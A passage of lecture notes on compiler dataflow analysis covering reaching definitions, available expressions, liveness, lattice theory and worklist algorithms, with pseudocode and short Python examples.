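preds = {"B1": [], "B2": ["B1"]}
use = {"B1": {"z"}, "B2": {"x"}}
defined = {"B1": {"x"}, "B2": set()}
live_out, live_in = dataflow(nodes, succs, preds, use, defined, union, set())
```

`live_in["B1"]` is `{z}` and `live_out["B1"]` is `{x}`: x is defined in B1 and used in B2, so it is live across the edge.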
## Comparison
### Reaching Definitions
For all nodes $n$ in $N$
- $\text{OUT}[n] = \text{emptyset}$;
- $\text{IN}[\text{Entry}] = \text{emptyset}$;
- $\text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]$;
- $\text{Changed} = N - \{ \text{Entry} \};$
while $(\text{Changed} \neq \text{emptyset})$
- choose a node $n$ in $\text{Changed}$;
- $\text{Changed} = \text{Changed} - \{ n \};$
- $\text{IN}[n] = \text{emptyset}$;
- for all nodes $p$ in $\text{predecessors}(n)$
- $\text{IN}[n] = \text{IN}[n] \cup \text{OUT}[p]$;
- $\text{OUT}[n] = \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n])$;
- if $(\text{OUT}[n] \text{ changed})$
- for all nodes $s$ in $\text{successors}(n)$
- $\text{Changed} = \text{Changed} \cup \{ s \};$
### Available Expressions
For all nodes $n$ in $N$
- $\text{OUT}[n] = E$;
- $\text{IN}[\text{Entry}] = \text{emptyset}$;
- $\text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]$;
- $\text{Changed} = N - \{ \text{Entry} \};$
while $(\text{Changed} \neq \text{emptyset})$
- choose a node $n$ in $\text{Changed}$;
- $\text{Changed} = \text{Changed} - \{ n \};$
- $\text{IN}[n] = E$;
- for all nodes $p$ in $\text{predecessors}(n)$
- $\text{IN}[n] = \text{IN}[n] \cap \text{OUT}[p]$;
- $\text{OUT}[n] = \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n])$;
- if $(\text{OUT}[n] \text{ changed})$
- for all nodes $s$ in $\text{successors}(n)$
- $\text{Changed} = \text{Changed} \cup \{ s \};$
### Liveness
For all nodes $n$ in $N - \{ \text{Exit} \}$
- $\text{IN}[n] = \text{emptyset}$;
- $\text{OUT}[\text{Exit}] = \text{emptyset}$;
- $\text{IN}[\text{Exit}] = \text{use}[\text{Exit}]$;
- $\text{Changed} = N - \{ \text{Exit} \};$
while $(\text{Changed} \neq \text{emptyset})$
- choose a node $n$ in $\text{Changed}$;
- $\text{Changed} = \text{Changed} - \{ n \};$
- $\text{OUT}[n] = \text{emptyset}$;
- for all nodes $s$ in $\text{successors}(n)$
- $\text{OUT}[n] = \text{OUT}[n] \cup \text{IN}[s]$;
- $\text{IN}[n] = \text{use}[n] \cup (\text{OUT}[n] - \text{def}[n])$;
- if $(\text{IN}[n] \text{ changed})$
- for all nodes $p$ in $\text{predecessors}(n)$
- $\text{Changed} = \text{Changed} \cup \{ p \};$
## Comparison
### Reaching Definitions
<table>
<thead>
<tr>
<th>Expression</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>( \text{OUT}[n] = \text{emptyset}; )</td>
<td>( \text{OUT} ) initialized to emptyset</td>
</tr>
<tr>
<td>( \text{IN}[\text{Entry}] = \text{emptyset}; )</td>
<td>( \text{IN} ) at ( \text{Entry} ) initialized to emptyset</td>
</tr>
<tr>
<td>( \text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]; )</td>
<td>( \text{OUT} ) at ( \text{Entry} ) updated with ( \text{GEN} )</td>
</tr>
<tr>
<td>( \text{Changed} = N - { \text{Entry} }; )</td>
<td>( \text{Changed} ) set to all nodes except ( \text{Entry} )</td>
</tr>
</tbody>
</table>
- **Algorithm:**
- While \( \text{Changed} \neq \text{emptyset} \):
- Choose a node \( n \) in \( \text{Changed} \);
- Update \( \text{Changed} \) to remove \( n \);
- Update \( \text{IN}[n] \) to \( \text{emptyset} \);
- For all predecessors \( p \) of \( n \):
- Update \( \text{IN}[n] \) to \( \text{IN}[n] \cup \text{OUT}[p] \);
- Compute \( \text{OUT}[n] \) as \( \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n]) \);
- If \( \text{OUT}[n] \) changed:
- For all successors \( s \) of \( n \):
- Update \( \text{Changed} \) to add \( s \);
### Available Expressions
<table>
<thead>
<tr>
<th>Expression</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>( \text{OUT}[n] = \text{E}; )</td>
<td>( \text{OUT} ) initialized to ( \text{E} ) (assuming ( \text{E} ) is used in context)</td>
</tr>
<tr>
<td>( \text{IN}[\text{Entry}] = \text{emptyset}; )</td>
<td>( \text{IN} ) at ( \text{Entry} ) initialized to emptyset</td>
</tr>
<tr>
<td>( \text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]; )</td>
<td>( \text{OUT} ) at ( \text{Entry} ) updated with ( \text{GEN} )</td>
</tr>
<tr>
<td>( \text{Changed} = N - { \text{Entry} }; )</td>
<td>( \text{Changed} ) set to all nodes except ( \text{Entry} )</td>
</tr>
</tbody>
</table>
- **Algorithm:**
- While \( \text{Changed} \neq \text{emptyset} \):
- Choose a node \( n \) in \( \text{Changed} \);
- Update \( \text{Changed} \) to remove \( n \);
- Update \( \text{IN}[n] \) to \( \text{emptyset} \);
- For all predecessors \( p \) of \( n \):
- Update \( \text{IN}[n] \) to \( \text{IN}[n] \cup \text{OUT}[p] \);
- Compute \( \text{OUT}[n] \) as \( \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n]) \);
- If \( \text{OUT}[n] \) changed:
- For all successors \( s \) of \( n \):
- Update \( \text{Changed} \) to add \( s \);
## Reaching Definitions

```
for all nodes n in N
    OUT[n] = emptyset;
IN[Entry] = emptyset;
OUT[Entry] = GEN[Entry];
Changed = N - { Entry };

while (Changed != emptyset)
    choose a node n in Changed;
    Changed = Changed - { n };
    IN[n] = emptyset;
    for all nodes p in predecessors(n)
        IN[n] = IN[n] U OUT[p];
    OUT[n] = GEN[n] U (IN[n] - KILL[n]);
    if (OUT[n] changed)
        for all nodes s in successors(n)
            Changed = Changed U { s };
```
## Liveness

Liveness is a backward analysis: `OUT[n]` is accumulated from the `IN` sets of the *successors* `s`, and changes propagate to predecessors:

```
for all nodes n in N
    IN[n] = emptyset;
OUT[Exit] = emptyset;
IN[Exit] = use[Exit];
Changed = N - { Exit };

while (Changed != emptyset)
    choose a node n in Changed;
    Changed = Changed - { n };
    OUT[n] = emptyset;
    for all nodes s in successors(n)
        OUT[n] = OUT[n] U IN[s];
    IN[n] = use[n] U (OUT[n] - def[n]);
    if (IN[n] changed)
        for all nodes p in predecessors(n)
            Changed = Changed U { p };
```
## Basic Idea
Information about program represented using values from algebraic structure called **lattice**
Analysis produces lattice value for each program point
Two flavors of analysis
- Forward dataflow analysis [e.g., Reachability]
- Backward dataflow analysis [e.g. Live Variables]
## Forward Dataflow Analysis
Analysis propagates values forward through control flow graph with flow of control
- Each node has a **transfer function** $f$
- Input – value at program point before node
- Output – new value at program point after node
- Values flow from program points after predecessor nodes to program points before successor nodes
- **At join points**, values are combined using a merge function
## Backward Dataflow Analysis
Analysis propagates values backward through control flow graph against flow of control
- Each node has a transfer function $f$
- Input – value at program point after node
- Output – new value at program point before node
- Values flow from program points before successor nodes to program points after predecessor nodes
- At split points, values are combined using a merge function
## Partial Orders
Set $P$
Partial order relation $\leq$ such that $\forall x, y, z \in P$
- $x \leq x$ (reflexive)
- $x \leq y$ and $y \leq x$ implies $x = y$ (antisymmetric)
- $x \leq y$ and $y \leq z$ implies $x \leq z$ (transitive)
Can use partial order to define
- Upper and lower bounds
- Least upper bound
- Greatest lower bound
## Upper Bounds
If $S \subseteq P$ then
- $x \in P$ is an upper bound of $S$ if $\forall y \in S. \ y \leq x$
- $x \in P$ is the least upper bound of $S$ if
- $x$ is an upper bound of $S$, and
- $x \leq y$ for all upper bounds $y$ of $S$
- $\lor$ - join, least upper bound, $lub$, supremum, $sup$
- $\lor S$ is the least upper bound of $S$
- $x \lor y$ is the least upper bound of $\{x, y\}$
## Lower Bounds
If $S \subseteq P$ then
- $x \in P$ is a lower bound of $S$ if $\forall y \in S. x \leq y$
- $x \in P$ is the greatest lower bound of $S$ if
- $x$ is a lower bound of $S$, and
- $y \leq x$ for all lower bounds $y$ of $S$
- $\wedge$ - meet, greatest lower bound, glb, infimum, inf
- $\wedge S$ is the greatest lower bound of $S$
- $x \wedge y$ is the greatest lower bound of $\{x, y\}$
## Covering
\[ x < y \text{ if } x \leq y \text{ and } x \neq y \]
**x is covered by y** (y covers x) if
- \( x < y \), and
- \( x \leq z < y \) implies \( x = z \)
Conceptually, y covers x if there are no elements between x and y
## Example
\[ P = \{000, 001, 010, 011, 100, 101, 110, 111\} \]
(standard boolean lattice, also called hypercube)
\( x \leq y \) is equivalent to \((x \text{ bitwise-and } y) = x\)
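The bitwise characterization can be checked directly; this sketch (illustrative, not from the lecture) treats 3-bit integers as elements of the boolean lattice, with bitwise-or as join and bitwise-and as meet.

```python
# Boolean lattice on 3-bit values: x <= y  iff  (x bitwise-and y) == x.
def leq(x: int, y: int) -> bool:
    return (x & y) == x

def join(x: int, y: int) -> int:   # least upper bound = bitwise-or
    return x | y

def meet(x: int, y: int) -> int:   # greatest lower bound = bitwise-and
    return x & y

# The order, join, and meet agree on all pairs in {000, ..., 111}:
for x in range(8):
    for y in range(8):
        assert leq(x, y) == (join(x, y) == y) == (meet(x, y) == x)
```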
## Hasse Diagram
- If \( y \) covers \( x \)
- Line from \( y \) to \( x \)
- \( y \) above \( x \) in diagram
## Lattices
Consider poset \((P, \leq)\) and the operators \(\wedge\) (meet) and \(\vee\) (join)
If for all \(x, y \in P\) there exist \(x \wedge y\) and \(x \vee y\), then \(P\) is a lattice.
If for all \(S \subseteq P\) there exist \(\wedge S\) and \(\vee S\), then \(P\) is a complete lattice.
All finite lattices are complete.
Example of a lattice that is not complete: Integers \(Z\)
- For any \(x, y \in Z\), \(x \vee y = \max(x, y), x \wedge y = \min(x, y)\)
- But \(\vee Z\) and \(\wedge Z\) do not exist
- \(Z \cup \{+\infty, -\infty\}\) is a complete lattice
## Top and Bottom
Greatest element of P (if it exists) is top (\( \top \))
Least element of P (if it exists) is bottom (\( \bot \))
## Connection Between ≤, ∧, and ∨
The following 3 properties are equivalent:
• $x \leq y$
• $x \lor y = y$
• $x \land y = x$
Let’s prove:
• $x \leq y$ implies $x \lor y = y$ and $x \land y = x$
• $x \lor y = y$ implies $x \leq y$
• $x \land y = x$ implies $x \leq y$
Then by transitivity, we can obtain
• $x \lor y = y$ implies $x \land y = x$
• $x \land y = x$ implies $x \lor y = y$
## Connecting Lemma Proofs
Prove: $x \leq y$ implies $x \lor y = y$
- $x \leq y$ implies $y$ is an upper bound of $\{x,y\}$.
- Any upper bound $z$ of $\{x,y\}$ must satisfy $y \leq z$.
- So $y$ is least upper bound of $\{x,y\}$ and $x \lor y = y$
Prove: $x \leq y$ implies $x \land y = x$
- $x \leq y$ implies $x$ is a lower bound of $\{x,y\}$.
- Any lower bound $z$ of $\{x,y\}$ must satisfy $z \leq x$.
- So $x$ is greatest lower bound of $\{x,y\}$ and $x \land y = x$
## Connecting Lemma Proofs
Prove: \( x \lor y = y \) implies \( x \leq y \)
- \( y \) is an upper bound of \( \{x, y\} \) implies \( x \leq y \)
Prove: \( x \land y = x \) implies \( x \leq y \)
- \( x \) is a lower bound of \( \{x, y\} \) implies \( x \leq y \)
We have defined $\lor$ and $\land$ in terms of $\leq$
We will now define $\leq$ in terms of $\lor$ and $\land$
- Start with $\lor$ and $\land$ as arbitrary algebraic operations that satisfy **associative, commutative, idempotence, and absorption** laws
- Will define $\leq$ using $\lor$ and $\land$
- Will show that $\leq$ is a partial order
Intuitive concept of $\lor$ and $\land$ as information combination operators (or, and)
## Algebraic Properties of Lattices
Assume arbitrary operations \( \lor \) and \( \land \) such that
- \((x \lor y) \lor z = x \lor (y \lor z)\) (associativity of \( \lor \))
- \((x \land y) \land z = x \land (y \land z)\) (associativity of \( \land \))
- \(x \lor y = y \lor x\) (commutativity of \( \lor \))
- \(x \land y = y \land x\) (commutativity of \( \land \))
- \(x \lor x = x\) (idempotence of \( \lor \))
- \(x \land x = x\) (idempotence of \( \land \))
- \(x \lor (x \land y) = x\) (absorption of \( \lor \) over \( \land \))
- \(x \land (x \lor y) = x\) (absorption of \( \land \) over \( \lor \))
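These laws can be verified by brute force on a small example; the following sketch (illustrative, not from the lecture) checks them on the powerset of {a, b, c} with union as join and intersection as meet.

```python
# Brute-force check of the lattice axioms on the powerset of {a, b, c}.
from itertools import chain, combinations

universe = "abc"
subsets = [frozenset(s) for s in chain.from_iterable(
    combinations(universe, r) for r in range(len(universe) + 1))]

for x in subsets:
    for y in subsets:
        assert x | y == y | x and x & y == y & x   # commutativity
        assert x | x == x and x & x == x           # idempotence
        assert x | (x & y) == x                    # absorption of join over meet
        assert x & (x | y) == x                    # absorption of meet over join
        for z in subsets:
            assert (x | y) | z == x | (y | z)      # associativity of join
            assert (x & y) & z == x & (y & z)      # associativity of meet
```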
## Connection Between $\land$ and $\lor$
$x \lor y = y$ if and only if $x \land y = x$
Proof of $x \lor y = y$ implies $x = x \land y$
$$x = x \land (x \lor y) \quad \text{(by absorption)}$$
$$= x \land y \quad \text{(by assumption)}$$
Proof of $x \land y = x$ implies $y = x \lor y$
$$y = y \lor (y \land x) \quad \text{(by absorption)}$$
$$= y \lor (x \land y) \quad \text{(by commutativity)}$$
$$= y \lor x \quad \text{(by assumption)}$$
$$= x \lor y \quad \text{(by commutativity)}$$
## Properties of $\leq$
Define $x \leq y$ if $x \lor y = y$
Proof of transitive property. Must show that
$x \lor y = y$ and $y \lor z = z$ implies $x \lor z = z$
$x \lor z = x \lor (y \lor z)$ (by assumption)
$= (x \lor y) \lor z$ (by associativity)
$= y \lor z$ (by assumption)
$= z$ (by assumption)
## Properties of ≤
Proof of antisymmetry property. Must show that
\[ x \lor y = y \text{ and } y \lor x = x \implies x = y \]
\[ x = y \lor x \quad (\text{by assumption}) \]
\[ = x \lor y \quad (\text{by commutativity}) \]
\[ = y \quad (\text{by assumption}) \]
Proof of reflexivity property. Must show that
\[ x \lor x = x \]
\[ x \lor x = x \quad (\text{by idempotence}) \]
## Properties of $\leq$
Induced operation $\leq$ agrees with original definitions of $\lor$ and $\land$, i.e.,
- $x \lor y = \text{sup} \{x, y\}$
- $x \land y = \text{inf} \{x, y\}$
Proof of $x \lor y = \sup \{x, y\}$
Consider any upper bound $u$ for $x$ and $y$.
Given $x \lor u = u$ and $y \lor u = u$, must show $x \lor y \leq u$, i.e., $(x \lor y) \lor u = u$
\[
\begin{align*}
u &= x \lor u \quad \text{(by assumption)} \\
&= x \lor (y \lor u) \quad \text{(by assumption)} \\
&= (x \lor y) \lor u \quad \text{(by associativity)}
\end{align*}
\]
Proof of $x \land y = \inf \{x, y\}$
- Consider any lower bound $L$ for $x$ and $y$.
- Given $x \land L = L$ and $y \land L = L$, must show $L \leq x \land y$, i.e., $(x \land y) \land L = L$
$$L = x \land L \quad \text{(by assumption)}$$
$$= x \land (y \land L) \quad \text{(by assumption)}$$
$$= (x \land y) \land L \quad \text{(by associativity)}$$
## Chains
A set $S$ is a chain if $\forall x,y \in S. \ y \leq x$ or $x \leq y$
$P$ has no infinite chains if every chain in $P$ is finite
$P$ satisfies the **ascending chain condition** if for all sequences $x_1 \leq x_2 \leq \ldots$ there exists $n$ such that $x_n = x_{n+1} = \ldots$
## Application to Dataflow Analysis
Dataflow information will be lattice values
- **Transfer functions** operate on lattice values
- Solution algorithm will generate **increasing sequence of values** at each program point
- Ascending chain condition will ensure **termination**
We will use \( \vee \) to combine values at control-flow join points
## Transfer Functions
Transfer function $f : P \rightarrow P$ is defined for each node in control flow graph
The function $f$ models effect of the node on the program information
## Transfer Functions
Each dataflow analysis problem has a set $F$ of transfer functions $f: P \rightarrow P$. This set $F$ contains:
- **Identity function** belongs to the set, $i \in F$
- $F$ must be closed under composition:
\[ \forall f, g \in F. \text{ the function } h = \lambda x. f(g(x)) \in F \]
- Each $f \in F$ must be **monotone**:
\[ x \leq y \text{ implies } f(x) \leq f(y) \]
- Sometimes all $f \in F$ are **distributive**:
\[ f(x \lor y) = f(x) \lor f(y) \]
- Note that Distributivity implies monotonicity
## Distributivity Implies Monotonicity
Proof.
Assume distributivity: \( f(x \lor y) = f(x) \lor f(y) \)
Must show: \( x \lor y = y \) implies \( f(x) \lor f(y) = f(y) \)
\[
\begin{align*}
f(y) &= f(x \lor y) \quad \text{(by assumption)} \\
&= f(x) \lor f(y) \quad \text{(by distributivity)}
\end{align*}
\]
## Putting the Pieces Together: Forward Dataflow Analysis

*Simulates execution of the program forward, with the flow of control*
For each node $n$, we have
- $\text{in}_n$ – value at program point before $n$
- $\text{out}_n$ – value at program point after $n$
- $f_n$ – transfer function for $n$ (given $\text{in}_n$, computes $\text{out}_n$)
Requires that solution satisfies
- $\forall n. \text{out}_n = f_n(\text{in}_n)$
- $\forall n \neq n_0. \text{in}_n = \lor \{ \text{out}_m . m \text{ in pred}(n) \}$
- $\text{in}_{n_0} = I$, $I$ summarizes information at start of program
## Dataflow Equations
Compiler processes program to obtain a set of dataflow equations
\[
\begin{align*}
\text{out}_n & := f_n(\text{in}_n) \\
\text{in}_n & := \lor \{ \text{out}_m \cdot m \in \text{pred}(n) \}
\end{align*}
\]
Conceptually separates analysis problem from program
## Worklist Algorithm for Solving Forward Dataflow Equations
for each \( n \) do \( \text{out}_n := f_n(\bot) \)
\( \text{in}_{n_0} := I; \text{out}_{n_0} := f_{n_0}(I) \)
worklist := \( N - \{ n_0 \} \)
while worklist \( \neq \emptyset \) do
remove a node \( n \) from worklist
\( \text{in}_n := \lor \{ \text{out}_m . m \text{ in } \text{pred}(n) \} \)
\( \text{out}_n := f_n(\text{in}_n) \)
if \( \text{out}_n \) changed then
worklist := worklist \( \cup \) \( \text{succ}(n) \)
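The worklist algorithm above can be written out as executable Python; this is a hedged sketch where the CFG, transfer functions, join, bottom element, and entry value `I` are all parameters (the names and the tiny GEN/KILL usage are illustrative, not from the lecture). Like the pseudocode, it assumes the entry node has no predecessors.

```python
# Generic forward worklist solver, following the pseudocode above.
def forward_dataflow(nodes, entry, preds, succs, f, join, bottom, I):
    out = {n: f[n](bottom) for n in nodes}     # for each n: out_n := f_n(bottom)
    in_ = {n: bottom for n in nodes}
    in_[entry] = I
    out[entry] = f[entry](I)
    worklist = set(nodes) - {entry}
    while worklist:
        n = worklist.pop()                     # remove a node n from worklist
        new_in = bottom
        for m in preds[n]:                     # in_n := join of out_m over preds
            new_in = join(new_in, out[m])
        in_[n] = new_in
        new_out = f[n](new_in)                 # out_n := f_n(in_n)
        if new_out != out[n]:                  # if out_n changed ...
            out[n] = new_out
            worklist |= set(succs[n])          # ... re-enqueue successors
    return in_, out

# Tiny usage: a three-node chain with GEN/KILL transfer functions,
# where definition d2 kills d1 (illustrative names).
f = {0: lambda x: frozenset({"d1"}) | x,
     1: lambda x: frozenset({"d2"}) | (x - frozenset({"d1"})),
     2: lambda x: x}
in_, out = forward_dataflow(
    nodes=[0, 1, 2], entry=0,
    preds={0: [], 1: [0], 2: [1]}, succs={0: [1], 1: [2], 2: []},
    f=f, join=lambda a, b: a | b, bottom=frozenset(), I=frozenset())
print(out[2])  # frozenset({'d2'})
```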
## Correctness Argument
Why does result satisfy dataflow equations?
• Whenever process a node \( n \), algorithm sets \( \text{out}_n := f_n(\text{in}_n) \)
Therefore, the algorithm ensures that \( \text{out}_n = f_n(\text{in}_n) \)
• Whenever \( \text{out}_m \) changes, put \( \text{succ}(m) \) on worklist. Consider any node \( n \in \text{succ}(m) \). It will eventually come off worklist and algorithm will set
\[
\text{in}_n := \lor \{ \text{out}_m . m \in \text{pred}(n) \}
\]
to ensure that \( \text{in}_n = \lor \{ \text{out}_m . m \in \text{pred}(n) \} \)
• So final solution will satisfy dataflow equations
• Need also to ensure that the dataflow equalities correspond to the states in the program execution (this comes later!)
## Termination Argument
Why does algorithm terminate?
Sequence of values taken on by $\text{IN}_n$ or $\text{OUT}_n$ is a chain. If values stop increasing, worklist empties and algorithm terminates.
If lattice has ascending chain property, algorithm terminates
- **Algorithm terminates for finite lattices**
- For lattices without ascending chain property, use *widening operator*
## Termination Argument (Details)
- For lattice \((L, \leq)\)
- Start: each node \(n \in \text{CFG}\) has an initial IN set, called \(\text{IN}_0[n]\)
- When \(F\) is **monotone**, for each \(n\), successive values of \(\text{IN}[n]\) form a non-decreasing sequence.
- Any chain starting at \(x \in L\) has at most \(c_x\) elements
- \(x = \text{IN}[n]\) can increase in value at most \(c_x\) times
- Then \(C = \max_{n \in \text{CFG}} c_{\text{IN}[n]}\) is finite
- On every iteration, at least one \(\text{IN}\) set must increase in value
- If the loop executed \(N \times C\) times, all \(\text{IN}\) sets would be \(\top\)
- The algorithm terminates in \(O(N \times C)\) steps
## Speed of Convergence
Loop Connectedness $d(G)$: for a reducible CFG $G$, it is the maximum number of back edges in any acyclic path in $G$.
**Rapid:** A Data-flow framework $(L, \leq, F)$ is called **Rapid** if
\[
\forall f \in F, \forall x \in L. \quad x \land f(\top) \leq f(x)
\]
Kam & Ullman, 1976: if the data-flow framework is **rapid**, then
- the depth-first version of the iterative algorithm halts in at most $d(G) + 3$ passes over the graph
- if the lattice $L$ has $\top$, at most $d(G) + 2$ passes are needed
In practice:
- $d(G) < 3$, so the algorithm makes less than 6 passes over the graph
- The rapid condition implies that the information around the loop stabilizes in 2 steps
## Widening Operators
Detect lattice values that may be part of infinitely ascending chain
Artificially raise value to least upper bound of chain
Example:
- Lattice is set of all subsets of integers
- E.g., it can collect possible values of the variables during the execution of program
- Widening operator might raise all sets of size $n$ or greater to TOP (likely to be useful for loops)
## Reaching Definitions Algorithm (Reminder)
for all nodes n in N
OUT[n] = emptyset; // OUT[n] = GEN[n];
IN[Entry] = emptyset;
OUT[Entry] = GEN[Entry];
Changed = N - { Entry }; // N = all nodes in graph
while (Changed != emptyset)
choose a node n in Changed;
Changed = Changed - { n };
IN[n] = emptyset;
for all nodes p in predecessors(n)
IN[n] = IN[n] U OUT[p];
OUT[n] = GEN[n] U (IN[n] - KILL[n]);
if (OUT[n] changed)
for all nodes s in successors(n)
Changed = Changed U { s };
## General Worklist Algorithm (Reminder)
for each $n$ do $\text{out}_n := f_n(\bot)$
$\text{in}_{n_0} := I$; $\text{out}_{n_0} := f_{n_0}(I)$
$\text{worklist} := N - \{ n_0 \}$
while $\text{worklist} \neq \emptyset$ do
remove a node $n$ from $\text{worklist}$
$\text{in}_n := \lor \{ \text{out}_m . m \text{ in } \text{pred}(n) \}$
$\text{out}_n := f_n(\text{in}_n)$
if $\text{out}_n$ changed then
$\text{worklist} := \text{worklist} \cup \text{succ}(n)$
## Reaching Definitions
P = powerset of the set of all definitions in the program (all subsets of the set of definitions)

$\lor = \cup$ (order is $\subseteq$)

$\bot = \emptyset$

$I = \text{in}_{n_0} = \bot$

F = all functions $f$ of the form $f(x) = a \cup (x - b)$
- $b$ is the set of definitions that the node kills
- $a$ is the set of definitions that the node generates

General pattern for many transfer functions:
- $f(x) = \text{GEN} \cup (x - \text{KILL})$
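The GEN/KILL transfer-function family can be captured as a small higher-order function; a minimal sketch (names illustrative, not from the lecture):

```python
# f(x) = GEN ∪ (x − KILL), the general pattern above.
def make_transfer(gen: frozenset, kill: frozenset):
    return lambda x: gen | (x - kill)

# A node that generates definition d2 and kills d1 (illustrative names):
f = make_transfer(frozenset({"d2"}), frozenset({"d1"}))
print(sorted(f(frozenset({"d1", "d3"}))))  # ['d2', 'd3']
```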
## Does Reaching Definitions Framework Satisfy Properties?
⊆ satisfies conditions for ≤
- **Reflexivity:** \( x \subseteq x \)
- **Antisymmetry:** \( x \subseteq y \) and \( y \subseteq x \) implies \( y = x \)
- **Transitivity:** \( x \subseteq y \) and \( y \subseteq z \) implies \( x \subseteq z \)
\( F \) satisfies transfer function conditions
- **Identity:** \( \lambda x.\emptyset \cup (x - \emptyset) = \lambda x.x \in F \)
- **Distributivity:** Will show \( f(x \cup y) = f(x) \cup f(y) \)
\[
\begin{align*}
f(x) \cup f(y) &= (a \cup (x - b)) \cup (a \cup (y - b)) \\
&= a \cup (x - b) \cup (y - b) = a \cup ((x \cup y) - b) \\
&= f(x \cup y)
\end{align*}
\]
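The distributivity identity just proved can also be confirmed by exhaustive checking over a small universe of definitions; a quick sketch (illustrative, not from the lecture):

```python
# Check f(x ∪ y) = f(x) ∪ f(y) for every GEN/KILL function over {d1, d2, d3}.
from itertools import chain, combinations

defs = "d1 d2 d3".split()
subsets = [frozenset(s) for s in chain.from_iterable(
    combinations(defs, r) for r in range(len(defs) + 1))]

for a in subsets:          # a = GEN set
    for b in subsets:      # b = KILL set
        f = lambda x, a=a, b=b: a | (x - b)
        for x in subsets:
            for y in subsets:
                assert f(x | y) == f(x) | f(y)
```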
## Does Reaching Definitions Framework Satisfy Properties?
What about composition of \( F \)?
Given \( f_1(x) = a_1 \cup (x-b_1) \) and \( f_2(x) = a_2 \cup (x-b_2) \)
we must show \( f_1(f_2(x)) \) can be expressed as \( a \cup (x - b) \)
\[
\begin{align*}
f_1(f_2(x)) &= a_1 \cup ((a_2 \cup (x-b_2)) - b_1) \\
&= a_1 \cup ((a_2 - b_1) \cup ((x-b_2) - b_1)) \\
&= (a_1 \cup (a_2 - b_1)) \cup ((x-b_2) - b_1) \\
&= (a_1 \cup (a_2 - b_1)) \cup (x-(b_2 \cup b_1))
\end{align*}
\]
• Let \( a = (a_1 \cup (a_2 - b_1)) \) and \( b = b_2 \cup b_1 \)
• Then \( f_1(f_2(x)) = a \cup (x - b) \)
## Reaching Definitions is Rapid

**Convergence is fast.** Write $f(x) = a_f \cup (x \cap b_f)$, where $a_f$ is the GEN set and $b_f$ is the complement of the KILL set. The rapid condition $x \land f(\top) \leq f(x)$ then always holds:

\[
\begin{align*}
f(x) & \geq x \land f(\top) \\
a_f \cup (x \cap b_f) & \geq x \cap (a_f \cup (\top \cap b_f)) \\
a_f \cup (x \cap b_f) & \geq x \cap (a_f \cup b_f) \\
a_f \cup (x \cap b_f) & \geq (x \cap a_f) \cup (x \cap b_f)
\end{align*}
\]

which holds term by term: $a_f \supseteq x \cap a_f$ and $x \cap b_f = x \cap b_f$.
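The rapid condition can likewise be checked by brute force for the GEN/KILL family; a quick sketch (illustrative, not from the lecture), using the fact that on the powerset lattice $\land$ is $\cap$ and $\leq$ is $\subseteq$:

```python
# Check x ∩ f(⊤) ⊆ f(x) for all GEN/KILL functions over {d1, d2, d3}.
from itertools import chain, combinations

top = frozenset({"d1", "d2", "d3"})
subsets = [frozenset(s) for s in chain.from_iterable(
    combinations(top, r) for r in range(len(top) + 1))]

for a in subsets:          # a = GEN set
    for b in subsets:      # b = KILL set
        f = lambda x, a=a, b=b: a | (x - b)
        for x in subsets:
            # <= on frozensets is the subset test, i.e. the lattice order here
            assert (x & f(top)) <= f(x)
```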
**General Result**
All GEN/KILL transfer function frameworks satisfy the three properties:
- Identity
- Distributivity
- Composition
And all of them converge rapidly
## Available Expressions

P = powerset of the set of all expressions in the program (all subsets of the set of expressions)

$\lor = \cap$ (order is $\supseteq$)

$\bot = E$, the set of all expressions (under $\supseteq$, the largest set is the least element)

$I = \text{in}_{n_0} = \emptyset$

F = all functions $f$ of the form $f(x) = a \cup (x - b)$
- $b$ is the set of expressions that the node kills
- $a$ is the set of expressions that the node generates
Another GEN/KILL analysis
## Concept of Conservatism
Reaching definitions use $\cup$ as join
• Optimizations must take into account all definitions that reach along **ANY path**
Available expressions use $\cap$ as join
• Optimization requires expression to be available along **ALL paths**
Optimizations must **conservatively take all possible executions into account.**
## Backward Dataflow Analysis
• Simulates execution of program backward against the flow of control
• For each node \( n \), we have
– \( \text{in}_n \) — value at program point before \( n \)
– \( \text{out}_n \) — value at program point after \( n \)
– \( f_n \) — transfer function for \( n \) (given \( \text{out}_n \), computes \( \text{in}_n \))
• Require that solution satisfies
– \( \forall n. \text{in}_n = f_n(\text{out}_n) \)
– \( \forall n \notin N_{\text{final}}. \text{out}_n = \lor \{ \text{in}_m . m \in \text{succ}(n) \} \)
– \( \forall n \in N_{\text{final}}.\ \text{out}_n = O \)
– where \( O \) summarizes information at the end of the program
## Worklist Algorithm for Solving Backward Dataflow Equations
for each n do $\text{in}_n := f_n(\bot)$
for each $n \in N_{\text{final}}$ do $\text{out}_n := O; \text{in}_n := f_n(O)$
worklist := $N - N_{\text{final}}$
while worklist $\neq \emptyset$ do
remove a node $n$ from worklist
$\text{out}_n := \vee \{ \text{in}_m . \ m \text{ in succ}(n) \}$
$\text{in}_n := f_n(\text{out}_n)$
if $\text{in}_n$ changed then
worklist := worklist $\cup$ pred(n)
## Live Variables
P = powerset of set of all variables in program (all subsets of set of variables in program)
\( \lor = \cup \) (order is \( \subseteq \))
\( \perp = \emptyset \)
\( \mathcal{O} = \emptyset \)
F = all functions f of the form \( f(x) = a \cup (x-b) \)
• b is set of variables that node kills
• a is set of variables that node reads
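The liveness instantiation can be run on a tiny straight-line program; a hedged sketch (node numbering, variable names, and the round-robin fixpoint loop are illustrative, not from the lecture):

```python
# Liveness on:  n0: a = 1   n1: b = a + 1   n2: return b
use  = {0: frozenset(),    1: frozenset("a"), 2: frozenset("b")}
defs = {0: frozenset("a"), 1: frozenset("b"), 2: frozenset()}
succ = {0: [1], 1: [2], 2: []}

live_in = {n: frozenset() for n in use}
changed = True
while changed:                 # simple round-robin fixpoint
    changed = False
    for n in (2, 1, 0):        # visit against the flow of control
        out = frozenset().union(*(live_in[s] for s in succ[n]))
        new_in = use[n] | (out - defs[n])   # IN[n] = use[n] ∪ (OUT[n] − def[n])
        if new_in != live_in[n]:
            live_in[n] = new_in
            changed = True

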